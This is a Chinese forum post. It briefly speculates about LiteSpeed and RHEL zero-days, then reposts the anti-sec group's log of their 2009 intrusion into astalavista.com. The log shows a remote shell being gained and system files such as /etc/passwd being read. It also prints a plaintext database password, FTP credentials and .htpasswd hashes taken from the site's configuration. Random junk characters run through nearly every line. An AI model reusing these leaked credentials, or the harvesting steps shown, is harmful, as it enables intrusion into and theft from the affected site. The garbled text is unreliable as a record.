里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。6 H! ~9 W* O1 P1 P9 f
6 }$ r: B& R: D* N
[root@front3 ~]# curl -I litespeedtech.com
' {1 T7 Y% r; L% MHTTP/1.1 200 OK3 o p5 N1 m! }6 A
Date: Fri, 05 Jun 2009 22:54:51 GMT
$ e2 E2 u6 v" B1 ]' pServer: LiteSpeed% o- N! q2 F( l: A$ k- d0 G- b
7 R/ P# R) `- S$ E, n+ ]8 j
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
( r* \8 @. M; x1 {- N* s8 K( _0 X8 X: P* _5 H$ V/ N
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
. i4 x/ n- P7 A/ c! o9 `5 l5 m2 F- w) @& ]
* F. L# c S* B( k/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
2 V A: ^9 B( [, T; p) ^+ |/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \. O9 [0 A0 }! B
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
! D& n$ A! Z4 Q$ `! ~+ v\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
+ V1 P# k6 v' D& K2 r2 \* J \/ \/ \/ \/ \/ \/ \/. k3 U) w5 d! z) @' q: x
The Hacking & Security Community6 }, I: o1 L4 [: o( a) x! z+ P
[+] Founded in 1997 by a hacker computer enthusiast
2 a/ P8 ^ |0 Q: O! U. S0 f; K3 J[-] Exposed in 2009 by anti-sec group
6 H, v4 \7 g |; ]* L1 {
: {0 X' }2 e" pFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
4 B* N" B' |* m! X- `& ]9 J, w>> 03. Who’s behind the site?
; I3 C+ ?$ X/ l. H>>
2 o3 c! d3 N, Z; D" p1 o>> A team of security and IT professionals, and a countless number of contributors from all over the world.9 h/ C, D/ b; V, d6 ^
# X' q/ p; U5 A1 O r7 b- H>> 05. Is it true that the site is visited by script-kiddies and warez fans only?# b8 ? i0 g$ n% M
>> _/ m2 |$ T, {+ V
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
! W* q- {8 B8 ^2 ]; v! ]military institutions.3 n; Y: }& c# v: Y% M
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
0 Y! U1 E2 p6 X( _
7 P# d! G. W4 a; jWhy has Astalavista been targeted?
8 m) @1 ]( U$ C4 l' Y% D; s+ C2 r3 [* c
Other than the fact that they are not doing any of this for the “community” but
+ b: q3 h1 q2 E* [' rfor the money, they spread exploits for kids, claim to be a security community
7 _- ]! N8 w" {+ |(with no real sense of security on their own servers), and they charge you $6.66* i1 r% g1 d, H& m' F1 _# \: U* s9 P
per months to access a dead forum with a directory filled with public releases f# ?# ?+ B0 S, A0 R U
and outdated / broken services.1 Z Z& f; e7 f* ~" p
. c) T7 ?& [# I( Y+ \" T8 q! Q) V- wWe wanted to see how good that “team of security and IT professionals” really is.) t' F- y' A$ i3 y1 G
& _+ h4 c8 Y/ A! }. ~6 q4 h
Let’s begin.. E, [( b W. ~* O% |
+ i0 F; I* l, M0 L% L7 h1 s9 w
anti-sec:~# ./g0tshell astalavista.com -p 80
5 ~8 u8 u) B o. z[+] Connecting to astalavista.com:805 n/ |( h4 F I6 {. d
[+] Grabbing banner…3 J+ m& L/ m& }8 k! v
LiteSpeed
) A; b) e5 h, d- c1 u0 I[+] Injecting shellcode…, ^) \) _6 g& W: D5 A- i5 x
[-] Wait for it
( D. m& X- Z' R/ R. b- z/ {7 i/ k% G7 P5 j. d6 \
[~] We g0tshell$ F. H8 S# r2 C' R% E- p
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux1 p4 W( P$ Y x; Z8 S [# J
ID: uid=100(apache) gid=500(apache) groups=500(apache)
! V9 r' h: C' v8 P' ^5 r
/ [6 B) q2 N+ c$ S+ Z3 Ysh-3.2$ cat /etc/passwd
3 ~1 X% n5 \2 j! e8 z& vroot:x:0:0:root:/root:/bin/bash7 h" f- v$ }9 d6 p/ s1 G7 {
bin:x:1:1:bin:/bin:/sbin/nologin$ S9 `. \$ I8 O* L
daemon:x:2:2:daemon:/sbin:/sbin/nologin9 X! Q, y* p# [* J3 o. X4 i
adm:x:3:4:adm:/var/adm:/sbin/nologin! A. i: V* u. f3 q+ M0 U) Q8 X. G
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin5 v- `* _ r) ^ a6 N
sync:x:5:0:sync:/sbin:/bin/sync; v" q, i/ ]- b, ^! o- |% j9 ^" i
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown4 O8 ]6 f: r! X. {6 A- s4 F0 S
halt:x:7:0:halt:/sbin:/sbin/halt
) A! `7 i6 M5 s ~# Umail:x:8:12:mail:/var/spool/mail:/sbin/nologin
U( M4 ?; y& G% [' onews:x:9:13:news:/etc/news:* o2 n# r* T2 F& i0 d
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin. j; M ^, {& A9 c0 l' K( J
operator:x:11:0 perator:/root:/sbin/nologin
" v6 y) M5 A0 W4 Igames:x:12:100:games:/usr/games:/sbin/nologin& P3 [# k. ^& K/ y+ w
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
: g$ v7 @- [. f' n& Pftp:x:14:50:FTP User:/var/ftp:/sbin/nologin7 C+ Q: c( z) g$ r" A( ~: G# X
nobody:x:99:99:Nobody:/:/sbin/nologin( `5 l8 ]7 q$ r4 c0 M
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
* L3 A; S, X* e9 U0 Udbus:x:81:81:System message bus:/:/sbin/nologin
6 k: d0 ^5 ]- T7 R A3 {nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- E9 X+ @9 j P+ A- W( Jmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
( E1 z" W3 R1 {* w% i e0 C1 \smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
% e7 v3 i7 m0 ~. k" w- \vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin9 n% M1 q+ ^3 }1 l
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
]3 Y2 r( V9 m- ^2 Crpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
0 o/ ?2 r- J3 ?7 yrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
& ]0 Z8 Y) H0 |! Hnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin+ ~- @8 w# t7 Z& q6 T: d
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin7 P1 o2 I' @) U3 Q3 v) H& F
pcap:x:77:77::/var/arpwatch:/sbin/nologin
2 e) Y% L. N2 L; b9 D4 ?* q8 P7 ^) knamed:x:25:25:Named:/var/named:/sbin/nologin
( p/ e7 |1 A9 T5 [; yapache:x:100:500::/var/www:/bin/false: d- r+ `1 _) @
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
/ C# `" n& u' _# s- h7 y" }mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash- ]; |5 Z" ^$ P5 k0 [, f' Q8 f3 c
webapps:x:500:501::/var/www/html:/bin/bash: f9 E5 g. b0 g+ C
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
% ]: ^2 J. x% j9 h cadmin:x:501:502::/home/admin:/bin/bash# y1 Y. L. ?1 H+ n" ^9 K" x% L. Q" y
jon:x:502:503::/home/jon:/bin/bash
: {6 n" L& o7 I0 J4 pcom:x:503:504::/home/com:/bin/bash
- G% s& d/ h+ c6 ^/ g) q) }2 E3 ontp:x:38:38::/etc/ntp:/sbin/nologin* C3 O9 D& y5 C1 m9 d, P* y
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
9 R5 P8 g" a+ [' W: Tastanet:x:504:505::/home/astanet:/bin/bash# M3 ~2 F% k$ ^6 |
avahi:x:70:70:Avahi daemon:/:/sbin/nologin4 j+ p9 t7 f, K6 E4 `# z0 J$ Q
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
1 @0 s J$ x7 }( f; n
3 R9 o+ d+ K2 _3 X* Y! Ush-3.2$ cat /etc/hosts N7 m* d$ {4 m/ Q4 {2 J
# Do not remove the following line, or various programs5 u" h8 F h0 l! t" q
# that require network functionality will fail.% J: r1 H4 \4 }$ B8 @* @' ~9 P" s
127.0.0.1 localhost.localdomain localhost
2 _+ q0 _/ G% ?- l::1 localhost6.localdomain6 localhost6
. n4 G5 D- ?, i0 B) Q80.74.154.172 asta1.astalavistaserver.com
5 N& o7 u' `# g; B2 c+ h) G2 ^0 J" R* C
sh-3.2$ pwd
1 v5 _1 R- P: ?9 f/home/com/public_html; z- V$ o. u9 V4 C8 H7 U+ \" d
. ~$ Z$ F/ e6 Ysh-3.2$ ls -la; s/ m, T+ t) O* J; F
total 184606 p) |( I o: @ V2 y* b
drwxr-xr-x 30 com apache 4096 May 28 17:06 .1 n: {" Z# t& v7 o
drwx–x–x 11 com com 4096 Jun 25 2008 ..
* T$ C3 G& U* I, W* s I0 ^drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin8 N+ h; W, e9 |& _: X4 b
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
, m# y9 _6 Z4 e7 [/ h# W. o( ]drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
$ E- B) ^* m* D* V7 h" p' x$ odrwxrwxrwx 2 com com 4096 May 19 00:50 config
% r& U- e1 P9 }9 G' \drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
$ K7 P) @0 f5 f9 X0 H& Q8 W2 Adrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules- O% J% G+ }( _: M+ g/ l
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
1 P, N2 N* t0 a4 a& adrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
* b. g6 G* p3 L1 s; i( gdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
: J, Z- V1 @: J: j* J; f-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
! ]; a% m1 q; R3 j* E) k, Idrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
7 B6 i) j1 _. Y7 y" Ydrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
; A* e3 x' G5 U! p9 r0 B" M-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico" g: ? M( t0 v( f) E
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
3 M8 K: }9 r' b/ c; ]: D1 @. b-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
1 Q& S% C" x' h6 f2 K" H8 y-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak1 w" r# S- Z& l; v3 {, t
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak/ U( `5 F& i; H& p% E
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
: A; p" r! ^4 J' d8 Idrwxrwxrwx 14 com com 4096 Feb 2 19:29 images) b( e: t' @3 X, M/ O
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php: `4 W' ^. y* D V0 ? ^2 N
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer+ D8 Y2 m* E7 n2 j) g2 N* O W6 y
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
9 n3 \# u/ r' k% `6 V" \7 Vdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
' L. ?: \2 f; W# m( Fdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media2 v7 ]3 B' l" U
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications3 I* b* ~; G- h; }$ c( a8 \
drwxr-xr-x 34 com com 4096 May 28 16:30 modules% L# U" b5 }! o! Y! `* W3 _( l. q: Z
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin3 v7 y4 s4 c: X, E- C
drwxrwxr-x 22 com com 4096 May 28 17:06 _new, ^$ W' \1 \; Z# R# o
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
5 k- i# l, R' e+ |drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
5 p& q R# Z' g5 p1 q! Pdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy, H" n7 x1 _8 \: m% \2 ^" m" e8 B
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt1 L( J6 w" ]0 z* N
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
; f3 L0 L4 y m( v& j; }$ b( ~-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
! e8 M" M8 u! A2 t& udrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
/ J8 S5 S2 t" D9 z- ^drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
6 H7 v* g4 m! i. j' e$ U1 mdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
/ c" s1 P0 y' X
. T2 s* p& U9 r/ d/ l; _sh-3.2$ head -20 index.php
8 y' x0 g P) y# b. M t<?php' F4 d4 O- ~2 L% t7 ~
7 Y# S7 ]9 [# w. L" c' v; A) E4 X
/**
- \& D1 s& K; V' b1 }; w* The main page for the CMS
6 P3 k% G2 C; A% \9 e8 i* @copyright CONTREXX CMS - COMVATION AG# M* P7 O; p+ u2 h1 u4 f4 `1 Z' [
* @author Comvation Development Team5 k+ O' R' u' x; X
* @version v1.0.9.10.1 stable7 _8 H/ h- L$ k7 t: j
* @package contrexx
5 a# n+ ]" x% ?- F* @subpackage core/ L- ^- M" Q* o8 m' d
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage0 ?/ N; D0 l! ]' Q }2 u& E
* @since v0.0.0.0
. P! s9 P+ W! S9 L0 [6 G* @todo Capitalize all class names in project8 G/ i. ^' f; m
* @uses /config/configuration.php
5 h- Q( ?6 p; D2 I* @uses /config/settings.php9 b$ [- K. T- I: P/ |. z
* @uses /config/version.php
4 ~" Y' d+ P, O. Y* @uses /core/API.php
L# m$ t% |, m$ c" h1 j* @uses /core_modules/cache/index.class.php
7 c$ |. h9 T; @, F( H* c I# c* @uses /core/error.class.php- D" G! X* l2 c& e2 K+ C
* @uses /core_modules/banner/index.class.php
* Q) x% D0 |' u4 E" T" ~* @uses /core_modules/contact/index.class.php! n/ ]3 m# ^1 U
" C, ?- o: v6 P4 O) B( ~8 t' Z
sh-3.2$ cd config/
' Y4 O3 t7 h9 `sh-3.2$ ls -la
+ ^" h* i8 e, x, X {5 C Z o3 C8 ]total 320 H, F/ f l, L. z# w
drwxrwxrwx 2 com com 4096 May 19 00:50 .5 O) V$ i) d' p- b
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..% @: X" g3 S+ p/ V9 c3 p0 d
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php, D1 t. i, E! k1 l
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
6 x* S. Y/ X* n! w-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- `! {6 ]3 d$ Y' Z" k3 p) E-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php& f% l) ?6 ]4 k* A) a8 m7 ]; o
$ v/ c; _- A, c" `9 J3 ?$ h
sh-3.2$ cat configuration.php; M; A2 E4 I5 ]1 R% C5 o
[snip]
/ r+ H- O" S2 ~$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost3 s8 U& ^9 W0 f' v. q8 t1 P) ^5 w# M
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
0 i/ H# R2 f, z# ~0 J4 J$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
8 n5 @" Y3 c$ K" W! A$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
4 `( @/ I6 [! T$ J" G j' t$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
/ g9 W M( Z/ X5 D$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..) c4 ^1 f1 u' Q
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
, _9 n- O6 Z* a: T[snip]
* I! m* q) k3 D& W, Q. K$_FTPCONFIG['is_activated'] = true; // Ftp support true or false7 s1 [$ S5 x7 n, Y$ _# f; n; ]( ^$ ?
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode% G. L+ {+ B: O- i
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
d1 `: g% I, _) a3 }$_FTPCONFIG['port'] = 21; // Ftp remote port
; Q1 G' _" G6 z- J$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username- @8 o/ N6 z* @+ r1 j
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password. m2 k% H$ p# E7 P1 B
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms1 b2 r' g* g1 E2 U; d8 }2 z$ l% {, G
@, o4 e a" Zsh-3.2$ cd ..
4 |" }6 v/ F5 u' r( ?sh-3.2$ cd dvd/* G7 w4 L) w& J3 z# H' T
sh-3.2$ ls -la2 K; L: @! |& v9 R9 _
total 2913780
e. X& c4 P$ hdrwxr-xr-x 2 com com 4096 Sep 9 2008 .2 H6 K+ {) g6 T5 B2 n& j7 g$ Y
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
/ P! o8 X% |/ T! p8 Z; g-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
( a( Y& U! t# j0 X2 m-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
" E" V7 P* M* l) y8 n1 ] i' {1 b-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
- K, v7 n0 T( L& }6 o; A% C0 ?-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess0 \+ I+ I! H" |& y/ H; v" z
' f" b0 ?+ O `9 a/ Q. z! ish-3.2$ cat .htaccess0 G7 Y' X* m+ G, ~* D7 t2 E% }* ~4 f
authType Basic
6 L( s2 E7 m$ e! t VauthName DVD
" W5 ~- C/ p6 E3 G+ P: Q7 t: _* ?' _authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
: x6 u- g2 |0 A0 C$ P% a9 urequire valid-user3 x$ { `: r) O# f- _4 |5 F
+ F% Z. Z7 C/ q! v
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd( x% w7 Q$ ~6 o# L4 J. l- \5 @1 j- Q Z
DVDdownload:CRD8cuY6.MPT6
% {& {- e1 T0 Q* z( P$ }3 ~DVDdownload2:CR8a36.wluFMg" y* Q0 R" h" S
W1 c I8 b i! w* N! Q; i6 h( Hsh-3.2$ cat test.php
z; i/ W6 ]1 s1 ]% C# Y. Q+ n<?php: n% f+ l) C; }0 n/ U' g. c2 u$ t
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
* @& z$ f8 k/ n8 [$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));3 G9 U- F% E; Z& |
echo $url;
9 |7 ^# y Z C6 J$ U/ ??>
) R( ]! H3 Y, _4 _/ }6 F$ B: b" P( u0 T% @8 b% j; X
sh-3.2$ cd modifications/9 s; o9 [; Q# S3 [1 a$ x
sh-3.2$ ls -la# w! z# n- a0 C9 t
total 32' F: w' h* b+ ^" O
drwxr-xr-x 8 com com 4096 May 11 12:48 .- K' h' t. r7 l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..6 o5 ]0 p4 I% s* [7 z3 s
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
' g; ~1 \$ U2 [, j" V) l! Idrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs7 }' C1 s( j0 [+ F' ~8 i9 L
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools R1 I i; J$ E0 R+ \1 F6 y, ?. ^( v' t
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc9 L: F3 y4 N4 M
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search) B# \' a( z5 n3 N5 m& |0 @. r( ?
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
4 {. \% R: j/ O2 y1 ?2 q: o
3 p, j6 i" _6 fsh-3.2$ ls -R; O- g, z! _+ @* ~7 P& G
.:
1 \0 J0 Y; N7 e5 Jcom_avtng cronjobs onlinetools pjirc search _tmp
( [+ f' C9 `$ \" k8 M: _' w% k, W% W. V: ]5 y
./com_avtng:
. X, [: H: v9 R7 G0 mavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
+ X+ I3 I. t! `3 n- V; h
4 x3 }9 |: c3 _% }- }$ ]' r./com_avtng/scripts:
2 Q! U1 E# @* l2 c+ r- y5 k9 T7 [popunder.js4 n; H! y. I# X8 I7 f' n, K: b7 u
$ e3 j7 T1 g3 N8 t" H8 F* c
./cronjobs:* T% Z# G% K3 ^0 G
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp0 L; a/ Q" L" v6 D
! p3 E6 k" ^: ^. C9 U./cronjobs/tmp:
) X: I0 M0 U6 J0 j0 Rcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv: u0 g1 Y! b+ E$ S; g) V
0 S8 t" w& m, \" l9 L, R6 I9 D./onlinetools:6 H5 X! V, e. y- J
index.php
% a5 w3 O( g) i+ G! [
0 b5 _3 Z) h7 Z. P./pjirc:
. M, R: n4 e0 C) R0 ~a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt1 n9 P; C- E: L) h7 S
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt2 K8 v' G/ d) G' i: X: M3 B( j7 q
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd1 d+ T1 s2 Z5 [) N3 U( x& B3 ]1 R
1 r- i+ U: F- B. ~& z" M a./pjirc/img:) Y3 } ]+ [, O7 A& b- E5 n
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif' i; T% E% w u- H- Y, i
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif - u0 k' ]& N$ G @6 ^9 w1 p3 s
verre-eau.gif7 Q F5 ^" v1 ]) B" Z( G+ e/ ~
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
D; q# T9 q: s: ^& Qverre-vin.gif- k' d. Q* B4 R7 Z* A
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif# o+ e" G3 D, s) s( t6 u) N8 Q, k
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
I9 [& w. e3 s9 o' l0 B
% ^+ F4 v- L, X2 I! a$ R5 F./pjirc/snd:' n, P0 a+ T% l- S/ b3 v7 T
bell2.au ding.au: Y/ v2 x& G X- | z5 Y/ A% {7 G
) E* t7 H, g% I: K7 j9 U/ Z y./search:
& }4 E0 t4 H% U) J HsearchEngines.php search.php( h1 o+ j9 E! @3 N) j; j$ F
( Q3 e% t4 P% z) Q0 b0 {$ ~./_tmp:; }) q+ }8 p1 m- k# s' w# d
defaultPorts.php defaultPorts.txt
8 s# o. U3 g# P) A+ D; D* |, ]3 \5 U
sh-3.2$ cd cronjobs/
9 s4 D9 {1 f D* |% w- L+ Lsh-3.2$ cat exploits.php/ \9 R( s( ~) i
[snip]7 |( o$ T5 L% y. K, f* i7 P+ R
$categories = array();# j% D5 t6 p3 U7 K* T
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;) Y& h7 B' C/ a6 [ {: j4 e
$expolits = file($milw0rmFile);
: z8 ]1 s5 T: H7 y$comExploits = array();7 T) s; ?% y* H7 ]% W
[snip]
3 Y* J* B8 B8 `5 W0 b, B2 @& t// manage data/ B( |4 s, E% B( _- p
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640& t% H% o7 K' Z% A* s, }
( L! i3 b0 [: ]7 v. S/ D$ }# x
// get path and title
% F) g Y$ D# C& f+ n& ] $expolits[$x] = trim($expolits[$x]);; Z( z- i7 S1 Y6 W. x5 x
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
7 G9 l5 g3 e# |( R! j# @ $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
6 ?$ Q1 m$ C" J" G0 T& W0 X; H2 t+ C5 G" G4 }$ j) ~
// check if file exists# \6 G- o# J. ?6 W1 m* C' T- n2 Y
if (file_exists($path)) {7 _8 L* ]) H9 i% O
5 a) C' I" w$ F: U" [3 {
$text = file_get_contents($path);( P& S: d' |7 J
% B$ ~( N2 o; h" y" T3 u // get content and date! I* }/ J" n" ?) A& |/ w1 o# l! L
//$text = htmlspecialchars($text, ENT_QUOTES);
1 i& Z7 c% W; l- m0 s1 k $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
: W! l* z5 U$ f5 y. m if ($tmptext != ”) {
$ v( @7 Y, k3 M8 d5 u9 Z, r5 ] $text = $tmptext; m+ Q9 u; v5 K/ ~) `
} else {
/ @5 t Q* m* p% p' ~# ]. W" E $text = addslashes(htmlentities($text, ENT_QUOTES));/ S3 X5 x/ J! j' V/ o
}
; F0 j1 h- w9 {) J2 p $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));2 j! L4 y) }& Z% {
$tmp = explode('-', $date);) n$ e [3 M; c: N
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));4 D& V$ V( t! m, g; P
$cat = getCategory ($path);
; w- X+ O; l$ Y: R0 ] $ext = pathinfo(basename($path));4 W/ s, a& S& m1 q2 X
$ext = $ext['extension'];
% l; o) z# e6 v! H8 R4 { $qStr = ”9 s. k+ ^% u" Q4 r( \+ T& C* i6 A
SELECT `id`% Y7 [- @2 Z# U6 C% X ~: C" g
FROM `contrexx_module_exploits`8 k6 U3 K, L7 x8 W
WHERE `title` = ‘” . $title . “‘
& ^1 G/ J6 R6 i; Z# l AND `date` = ‘” . $date . “‘
$ [; r! p; Y! z& N “;8 o" A# {! h; o q- \
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;& r) f/ J0 {0 ]4 y B
$q = $_objDB->query($qStr);
" j6 Q) [% f& F2 U; Z
: \" e: ?( p8 F2 n: Z. M: M* M if ($q->numRows() == 0) {
. w8 _ j. `. D u; K( Q& L) u6 H2 c* I( H: @* Q! t6 c& e2 B
// prepare array3 g: U T( O2 ?# T( }
$comExploits[$x]['date'] = $date;
6 p8 L# p+ c7 I- d& ~ $comExploits[$x]['title'] = $title;; v6 F- _' l- ^- t1 \7 V9 X) }
$comExploits[$x]['author'] = ‘milw0rm’;
+ m% Z( o6 N! o' ` $comExploits[$x]['text'] = $text;
w& ?7 b% I3 ] $comExploits[$x]['source'] = $ext;
7 R3 c* \1 d+ M1 ^; W1 K5 L $comExploits[$x]['url1'] = ”; ^- n2 m% \' E7 R. I
$comExploits[$x]['url2'] = ”;
( |% i. O0 o$ I; j+ n, | $comExploits[$x]['catid'] = $cat;
( f8 a. a- [& A $comExploits[$x]['lang'] = ‘2′;
! B/ \1 T5 p8 i N" g; o0 X5 z $comExploits[$x]['userid'] = ‘12′;
3 t, i3 D+ w* e( }, r$ u. I) H $comExploits[$x]['startdate'] = ‘0000-00-00′;
/ G6 t- S& Y# q) A% f/ Q3 i( {6 U $comExploits[$x]['enddate'] = ‘0000-00-00′;7 E3 V; S" e) H
$comExploits[$x]['status'] = ‘1′;
" G# t6 t v- Q1 x $comExploits[$x]['changelog'] = $date;
" V# A U- [# ]; A$ J0 i$ x7 K8 o0 i3 N3 y' K; F& d3 G! Y& m" L
}# F% \$ ^/ m* x
[snip]6 i/ _7 g5 E3 q" n: c, \, ^
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
6 _, m; d8 [& p2 {* a" T<rss version=”2.0″> O( ]% _4 E$ P: q1 ^; |& Y# i
